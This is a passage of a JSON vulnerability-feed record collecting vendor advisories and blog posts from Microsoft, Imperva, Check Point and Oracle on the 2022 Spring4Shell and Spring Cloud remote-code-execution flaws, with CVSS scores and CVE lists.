10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-05T01:11:24", "type": "mssecure", "title": "SpringShell RCE vulnerability: Guidance for protecting against and detecting CVE-2022-22965", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1622", "CVE-2022-22947", "CVE-2022-22963", "CVE-2022-22965", "CVE-2202-22965"], "modified": "2022-04-05T01:11:24", "id": "MSSECURE:07417E2EE012BAE0350B156AD2AE30B3", "href": "https://www.microsoft.com/security/blog/2022/04/04/springshell-rce-vulnerability-guidance-for-protecting-against-and-detecting-cve-2022-22965/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "impervablog": [{"lastseen": "2022-03-31T18:03:34", "description": "New zero-day Remote Code Execution (RCE) vulnerabilities were discovered in Spring Framework, an application development framework and inversion of control container for the Java platform. These vulnerabilities potentially leave millions of applications at risk of compromise. In two separate disclosures, [zero-day](<https://www.imperva.com/learn/application-security/zero-day-exploit/>) RCE vulnerabilities were revealed in the Cloud and Core modules of Spring Framework.\n\nSpring Framework \u201cprovides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform\u201d [[1](<https://spring.io/projects/spring-framework>)]. Java is one of the most commonly used development languages, and Spring is commonly cited as one of the most popular Java frameworks.\n\nThe first of the disclosures [dropped](<https://www.cyberkendra.com/2022/03/rce-0-day-exploit-found-in-spring-cloud.html>) on March 26, and reported on a vulnerability in the Spring Framework Cloud module, which allowed for the injection of a SpEL expression into a header value. 
This crafted header value would then be evaluated by the server and could result in an RCE. The vulnerability was assigned [CVE-2022-22963](<https://tanzu.vmware.com/security/cve-2022-22963>).\n\nThe second of these disclosures was released on March 29 on Twitter by a researcher, in a since-deleted Tweet, containing a screenshot of the exploit request. Since then, the exploit was tweeted by others and published to GitHub, but again, was quickly removed. The vulnerability, called Spring Framework RCE via Data Binding on JDK 9+, comes in the form of a Java class injection flaw in Spring Core, where the JDK version is >=9.0. If exploited, an attacker can leverage this vulnerability to perform an RCE on the server. This vulnerability was assigned [CVE-2022-22965](<https://tanzu.vmware.com/security/CVE-2022-22965>).\n\nSince the disclosures, Imperva Threat Research has monitored widespread attempted exploitations of _both_ new zero-day vulnerabilities (~5.5 million and counting as of March 31).\n\n## Imperva Delivers Protection from CVE-2022-22963\n\nImperva Threat Research analysts downloaded and quickly tested the exploit, verifying that both vulnerabilities are blocked out of the box by [Imperva Cloud Web Application Firewall](<https://www.imperva.com/products/web-application-firewall-waf/>) (WAF) and Imperva WAF Gateway.\n\nGiven the nature of how [Imperva Runtime Protection (RASP)](<https://www.imperva.com/products/runtime-application-self-protection-rasp/>) works, RCEs caused by CVE-2022-22963 and Spring4Shell are stopped without requiring any code changes or policy updates. If Imperva RASP is currently deployed, applications of all kinds (active, legacy, third-party, APIs, etc.) are protected.\n\nTogether, Imperva WAF and Imperva RASP provide defense-in-depth for protecting applications and APIs. Both are industry-leading products that are designed to protect against zero day threats and the OWASP Top 10 application security threats, injections and weaknesses. 
If you\u2019re looking for protection from CVE-2022-22963, please contact us.\n\n**Q: How can I verify that Spring Framework RCE via Data Binding on JDK 9+ (Spring4Shell) is being blocked?**\n\n**A:** For CWAF customers, Imperva provides attack analytics, which shows customers any attempts to exploit CVE-2022-22963. In addition, existing rules for older vulnerabilities including CVE-2015-1427 protect against CVE-2022-22965.\n\nFor WAF Gateway customers, Imperva has signatures for older vulnerabilities, including CVE-2010-1871, CVE-2018-1260, and CVE-2015-1427, that protect against CVE-2022-22963 and CVE-2022-22965.\n\nImperva is also in the process of pushing more specific rules that will have a clear name associated with CVE-2022-22963 and CVE-2022-22965.\n\nThe post [Imperva Protects from New Spring Framework Zero-Day Vulnerabilities](<https://www.imperva.com/blog/imperva-protects-from-new-spring-framework-zero-day-vulnerabilities/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-31T15:20:03", "type": "impervablog", "title": "Imperva Protects from New Spring Framework Zero-Day Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2015-1427", "CVE-2018-1260", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-03-31T15:20:03", "id": "IMPERVABLOG:45FA8B88D226614CA46C4FD925A08C8B", "href": "https://www.imperva.com/blog/imperva-protects-from-new-spring-framework-zero-day-vulnerabilities/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "checkpoint_security": [{"lastseen": "2022-05-21T00:38:13", "description": "Solution\n\nOn March 29, 2022, new CVEs were published on Spring Cloud: [CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>), [CVE-2022-22946](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22946>), [CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>), and [CVE-2022-22950](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22950>).\n\nOn March 31, 2022, a bypass of the fix for [CVE-2010-1622](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1622>) was published by Praetorian, and received the nickname \"Spring4Shell\" (see [Spring Core on JDK9+ is vulnerable to remote code execution](<https://www.praetorian.com/blog/spring-core-jdk9-rce>)). Later, it was assigned [CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>).\n\nThe Check Point Infinity architecture is protected against this threat. We verified that this vulnerability does not affect our Infinity portfolio (including Quantum Security Gateways, Smart Management, Quantum Spark appliances with Gaia Embedded OS, Harmony Endpoint, Harmony Mobile, ThreatCloud, and CloudGuard). 
\nWe will continue to update you on any new development of this security event.\n\n### Check Point Products Status\n\n**Notes:**\n\n * No Check Point software version, including out-of-support versions, is vulnerable.\n * No Check Point appliance is vulnerable.\n\n### IPS protections\n\nCheck Point released these IPS protections:\n\n * Spring Core Remote Code Execution ([CVE-2022-22965](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22965>))\n * Spring Cloud Function Remote Code Execution ([CVE-2022-22963](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963>))\n * Spring Cloud Gateway Remote Code Execution ([CVE-2022-22947](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22947>))\n\nTo see these IPS protections in SmartConsole:\n\n 1. From the left navigation panel, click **Security Policies**.\n 2. In the upper pane, click **Threat Prevention** > **Custom Policy**.\n 3. In the lower pane, click **IPS Protections**.\n 4. In the top search field, enter the CVE number.\n\n**Best Practice** - Check Point recommends activating HTTPS Inspection (in the Security Gateway / Cluster object properties > HTTPS Inspection view), as the attack payload may appear in encrypted or decrypted traffic.\n\n### Harmony Endpoint for Linux Protection\n\n * Exploit_Linux_Spring4Shell_B\n\n### CloudGuard Containers Security Protection\n\n * Exploit_Linux_Spring4Shell_A\n\n**Related Articles:**\n\n * [sk126352 - Check Point Response to Spring Framework Vulnerabilities: CVE-2018-1270, CVE-2018-1273, CVE-2018-1275](<https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk126352>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, 
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-30T21:41:02", "type": "checkpoint_security", "title": "Check Point Response to Spring Vulnerabilities CVE-2022-22963, CVE-2022-22946, CVE-2022-22947, CVE-2022-22965 (Spring4Shell) and CVE-2022-22950 ", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1622", "CVE-2018-1270", "CVE-2018-1273", "CVE-2018-1275", "CVE-2022-22946", "CVE-2022-22947", "CVE-2022-22950", "CVE-2022-22963", "CVE-2022-22965"], "modified": "2022-03-30T21:41:02", "id": "CPS:SK178605", "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk178605", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "oracle": [{"lastseen": "2022-05-05T23:28:11", "description": "A Critical Patch Update is a collection of patches for multiple security vulnerabilities. These patches address vulnerabilities in Oracle code and in third-party components included in Oracle products. These patches are usually cumulative, but each advisory describes only the security patches added since the previous Critical Patch Update Advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security patches. 
Refer to [\u201cCritical Patch Updates, Security Alerts and Bulletins\u201d](<https://www.oracle.com/security-alerts/>) for information about Oracle Security advisories.\n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released security patches. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore strongly recommends that customers remain on actively-supported versions and apply Critical Patch Update security patches without delay.**\n\nThis Critical Patch Update contains 520 new security patches across the product families listed below. Please note that an MOS note summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at [April 2022 Critical Patch Update: Executive Summary and Analysis](<https://support.oracle.com/rs?type=doc&id=2857016.1>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-19T00:00:00", "type": "oracle", "title": "Oracle Critical Patch Update Advisory - April 2022", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", 
"authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-1000353", "CVE-2017-14159", "CVE-2017-17740", "CVE-2017-9287", "CVE-2018-1000067", "CVE-2018-1000068", "CVE-2018-1000192", "CVE-2018-1000193", "CVE-2018-1000194", "CVE-2018-1000195", "CVE-2018-11212", "CVE-2018-1285", "CVE-2018-1999001", "CVE-2018-1999002", "CVE-2018-1999003", "CVE-2018-1999004", "CVE-2018-1999005", "CVE-2018-1999007", "CVE-2018-2601", "CVE-2018-6356", "CVE-2018-8032", "CVE-2019-0227", "CVE-2019-1003049", "CVE-2019-1003050", "CVE-2019-10086", "CVE-2019-10247", "CVE-2019-10383", "CVE-2019-10384", "CVE-2019-12086", "CVE-2019-12399", "CVE-2019-12402", "CVE-2019-13038", "CVE-2019-13057", "CVE-2019-13565", "CVE-2019-13750", "CVE-2019-13751", "CVE-2019-14822", "CVE-2019-14862", "CVE-2019-16785", "CVE-2019-16786", "CVE-2019-16789", "CVE-2019-16792", "CVE-2019-17195", "CVE-2019-17571", "CVE-2019-18218", "CVE-2019-18276", "CVE-2019-19603", "CVE-2019-20388", "CVE-2019-20838", "CVE-2019-20916", "CVE-2019-3738", "CVE-2019-3739", "CVE-2019-3740", "CVE-2019-3799", "CVE-2019-5827", "CVE-2020-10531", "CVE-2020-10543", "CVE-2020-10693", "CVE-2020-10878", "CVE-2020-11022", "CVE-2020-11023", "CVE-2020-11080", "CVE-2020-11612", "CVE-2020-11971", "CVE-2020-11979", "CVE-2020-12243", "CVE-2020-12723", "CVE-2020-13434", "CVE-2020-13435", "CVE-2020-13935", "CVE-2020-13936", "CVE-2020-13956", "CVE-2020-14155", "CVE-2020-14340", "CVE-2020-14343", "CVE-2020-15250", "CVE-2020-15358", "CVE-2020-15719", "CVE-2020-16135", "CVE-2020-17521", "CVE-2020-17527", "CVE-2020-17530", "CVE-2020-1968", "CVE-2020-1971", "CVE-2020-24616", "CVE-2020-24750", "CVE-2020-24977", "CVE-2020-25638", "CVE-2020-25649", "CVE-2020-25659", "CVE-2020-27218", "CVE-2020-28052", "CVE-2020-28196", "CVE-2020-28895", "CVE-2020-29363", "CVE-2020-29582", "CVE-2020-35198", "CVE-2020-35490", "CVE-2020-35491", "CVE-2020-35728", "CVE-2020-36179", "CVE-2020-36180", "CVE-2020-36181", 
"CVE-2020-36182", "CVE-2020-36183", "CVE-2020-36184", "CVE-2020-36185", "CVE-2020-36186", "CVE-2020-36187", "CVE-2020-36188", "CVE-2020-36189", "CVE-2020-36242", "CVE-2020-36518", "CVE-2020-5245", "CVE-2020-5413", "CVE-2020-5421", "CVE-2020-6950", "CVE-2020-7226", "CVE-2020-7595", "CVE-2020-7760", "CVE-2020-8172", "CVE-2020-8174", "CVE-2020-8203", "CVE-2020-8231", "CVE-2020-8277", "CVE-2020-8284", "CVE-2020-8285", "CVE-2020-8286", "CVE-2020-8554", "CVE-2020-8908", "CVE-2020-9488", "CVE-2021-20231", "CVE-2021-20232", "CVE-2021-20289", "CVE-2021-21275", "CVE-2021-21290", "CVE-2021-21295", "CVE-2021-21409", "CVE-2021-21703", "CVE-2021-22096", "CVE-2021-22118", "CVE-2021-22132", "CVE-2021-22134", "CVE-2021-22144", "CVE-2021-22145", "CVE-2021-22569", "CVE-2021-22570", "CVE-2021-22696", "CVE-2021-22897", "CVE-2021-22898", "CVE-2021-22901", "CVE-2021-22946", "CVE-2021-22947", "CVE-2021-23017", "CVE-2021-23450", "CVE-2021-2351", "CVE-2021-23839", "CVE-2021-23840", "CVE-2021-23841", "CVE-2021-2427", "CVE-2021-2464", "CVE-2021-2471", "CVE-2021-25219", "CVE-2021-26291", "CVE-2021-27568", "CVE-2021-27645", "CVE-2021-27807", "CVE-2021-27906", "CVE-2021-28168", "CVE-2021-28169", "CVE-2021-28170", "CVE-2021-28657", "CVE-2021-29425", "CVE-2021-29505", "CVE-2021-29921", "CVE-2021-30129", "CVE-2021-30468", "CVE-2021-3156", "CVE-2021-31799", "CVE-2021-31810", "CVE-2021-31811", "CVE-2021-31812", "CVE-2021-3200", "CVE-2021-32066", "CVE-2021-32626", "CVE-2021-32627", "CVE-2021-32628", "CVE-2021-32672", "CVE-2021-32675", "CVE-2021-32687", "CVE-2021-32762", "CVE-2021-32785", "CVE-2021-32786", "CVE-2021-32791", "CVE-2021-32792", "CVE-2021-33037", "CVE-2021-33193", "CVE-2021-33560", "CVE-2021-33574", "CVE-2021-33813", "CVE-2021-33880", "CVE-2021-34429", "CVE-2021-3445", "CVE-2021-3449", "CVE-2021-3450", "CVE-2021-34798", "CVE-2021-35043", "CVE-2021-3517", "CVE-2021-3518", "CVE-2021-3520", "CVE-2021-3521", "CVE-2021-3537", "CVE-2021-35515", "CVE-2021-35516", "CVE-2021-35517", 
"CVE-2021-35574", "CVE-2021-3572", "CVE-2021-3580", "CVE-2021-35942", "CVE-2021-36084", "CVE-2021-36085", "CVE-2021-36086", "CVE-2021-36087", "CVE-2021-36090", "CVE-2021-36160", "CVE-2021-36373", "CVE-2021-36374", "CVE-2021-3690", "CVE-2021-3711", "CVE-2021-3712", "CVE-2021-37136", "CVE-2021-37137", "CVE-2021-37714", "CVE-2021-3807", "CVE-2021-38153", "CVE-2021-39139", "CVE-2021-39140", "CVE-2021-39141", "CVE-2021-39144", "CVE-2021-39145", "CVE-2021-39146", "CVE-2021-39147", "CVE-2021-39148", "CVE-2021-39149", "CVE-2021-39150", "CVE-2021-39151", "CVE-2021-39152", "CVE-2021-39153", "CVE-2021-39154", "CVE-2021-39275", "CVE-2021-4034", "CVE-2021-40438", "CVE-2021-40690", "CVE-2021-4104", "CVE-2021-41099", "CVE-2021-41164", "CVE-2021-41165", "CVE-2021-41182", "CVE-2021-41183", "CVE-2021-41184", "CVE-2021-4160", "CVE-2021-41617", "CVE-2021-4181", "CVE-2021-4182", "CVE-2021-4183", "CVE-2021-4184", "CVE-2021-4185", "CVE-2021-41973", "CVE-2021-42013", "CVE-2021-42340", "CVE-2021-42392", "CVE-2021-42717", "CVE-2021-43395", "CVE-2021-43527", "CVE-2021-43797", "CVE-2021-43818", "CVE-2021-43859", "CVE-2021-44224", "CVE-2021-44531", "CVE-2021-44532", "CVE-2021-44533", "CVE-2021-44790", "CVE-2021-44832", "CVE-2021-45105", "CVE-2022-0391", "CVE-2022-0778", "CVE-2022-20612", "CVE-2022-20613", "CVE-2022-20614", "CVE-2022-20615", "CVE-2022-21271", "CVE-2022-21375", "CVE-2022-21384", "CVE-2022-21404", "CVE-2022-21405", "CVE-2022-21409", "CVE-2022-21410", "CVE-2022-21411", "CVE-2022-21412", "CVE-2022-21413", "CVE-2022-21414", "CVE-2022-21415", "CVE-2022-21416", "CVE-2022-21417", "CVE-2022-21418", "CVE-2022-21419", "CVE-2022-21420", "CVE-2022-21421", "CVE-2022-21422", "CVE-2022-21423", "CVE-2022-21424", "CVE-2022-21425", "CVE-2022-21426", "CVE-2022-21427", "CVE-2022-21430", "CVE-2022-21431", "CVE-2022-21434", "CVE-2022-21435", "CVE-2022-21436", "CVE-2022-21437", "CVE-2022-21438", "CVE-2022-21440", "CVE-2022-21441", "CVE-2022-21442", "CVE-2022-21443", "CVE-2022-21444", "CVE-2022-21445", 
"CVE-2022-21446", "CVE-2022-21447", "CVE-2022-21448", "CVE-2022-21449", "CVE-2022-21450", "CVE-2022-21451", "CVE-2022-21452", "CVE-2022-21453", "CVE-2022-21454", "CVE-2022-21457", "CVE-2022-21458", "CVE-2022-21459", "CVE-2022-21460", "CVE-2022-21461", "CVE-2022-21462", "CVE-2022-21463", "CVE-2022-21464", "CVE-2022-21465", "CVE-2022-21466", "CVE-2022-21467", "CVE-2022-21468", "CVE-2022-21469", "CVE-2022-21470", "CVE-2022-21471", "CVE-2022-21472", "CVE-2022-21473", "CVE-2022-21474", "CVE-2022-21475", "CVE-2022-21476", "CVE-2022-21477", "CVE-2022-21478", "CVE-2022-21479", "CVE-2022-21480", "CVE-2022-21481", "CVE-2022-21482", "CVE-2022-21483", "CVE-2022-21484", "CVE-2022-21485", "CVE-2022-21486", "CVE-2022-21487", "CVE-2022-21488", "CVE-2022-21489", "CVE-2022-21490", "CVE-2022-21491", "CVE-2022-21492", "CVE-2022-21493", "CVE-2022-21494", "CVE-2022-21496", "CVE-2022-21497", "CVE-2022-21498", "CVE-2022-21716", "CVE-2022-21824", "CVE-2022-22719", "CVE-2022-22720", "CVE-2022-22721", "CVE-2022-22947", "CVE-2022-22963", "CVE-2022-22965", "CVE-2022-22968", "CVE-2022-23181", "CVE-2022-23221", "CVE-2022-23302", "CVE-2022-23305", "CVE-2022-23307", "CVE-2022-23437", "CVE-2022-23852", "CVE-2022-23943", "CVE-2022-23990", "CVE-2022-24329", "CVE-2022-25235", "CVE-2022-25236", "CVE-2022-25313", "CVE-2022-25314", "CVE-2022-25315"], "modified": "2022-05-04T00:00:00", "id": "ORACLE:CPUAPR2022", "href": "https://www.oracle.com/security-alerts/cpuapr2022.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}